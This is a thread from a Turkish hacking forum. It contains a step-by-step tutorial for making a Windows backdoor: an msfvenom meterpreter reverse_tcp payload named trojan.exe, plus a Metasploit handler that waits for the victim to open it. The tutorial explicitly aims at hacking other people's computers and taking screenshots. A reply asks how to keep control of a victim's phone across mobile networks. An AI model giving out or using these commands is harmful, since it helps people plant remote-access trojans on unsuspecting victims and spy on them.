// Pentestbox Backdoor Oluşturma (PC Hack) // AquieLL

AquieLL

Kıdemli Üye
1 Tem 2014
4,034
16
aquu.php
Herkese Merhaba arkadaşlar dün sizlere pentestbox'da android cihazlara sızmayı göstermiştim.Bugün sizlere pentestbox'da Backdoor oluşturup bilgisayar hacklemeyi göstereceğim.

qbJP6d.png

-----------------------------------------------------------------------

##Pentestbox Backdoor Oluşturma (PC Hack) ##

1-)msfvenom'a geçelim.
Kod:
msfvenom

2-)Backdoor'u oluşturalım
Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=İP ADRESİNİZ LPORT=4444 x > C:\Users\Kullanıcı\Desktop\trojan.exe

3-)msfconsole geçelim
Kod:
msfconsole

4-)Gelen bağlantıları dinleyecek handlerımızı belirtiyoruz.
Kod:
use exploit/multi/handler

5-)Payload'ı seçelim.
Kod:
paylaod set PAYLOAD windows/meterpreter/reverse_tcp

6-)Bağlantı alabilmek için ip adresmizi girelim
Kod:
set LHOST İPADRESİNİZ

7-)Portu girelim
Kod:
set LPORT 4444

:cool:Exploit edelim.
Kod:
exploit

Karşı taraf trojanı açınca bağlantı gelecektir.karşı tarafın ekran görüntüsü falan alabilirsiniz.

ANKA SALDIRI TİM // AquieLL ;)

Leopic

Yaşayan Forum Efsanesi
26 Şub 2016
9,948
10
Görsel ekliyerek daha şık ve güzel yapabilirsiniz ellerinize sağlık :)

ordo

Yeni üye
7 Eki 2009
23
0
ben acemi biri olarak 1 soru sorabilirmiyim
sorum su hocam bu koda benzer bir kod yazılımı ile apk hazırlıyoruz msfvenom biliyorsunuzdur ama kurban sonuçda aynı ağda olmuyacak sorum su ben eskaza kurbana apk yı yedirdim farzediyorum bu kodu yazarken ip adresi olarak ne yazmam lazım ki ister kendi operatörü ister başka bir ağ türkcell,avea,vadofone kendi agını açtıgında bile biz bu kurbanın telefonuna hakim olabilelim yoksa bunun bir anlamı yok soruma yanıt alabilirsem cok sevinirim hocam public ip demesseniz sevinirim denedim olmadı şimdiden çok TEŞEKKÜR EDERİM ÜSTAD

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.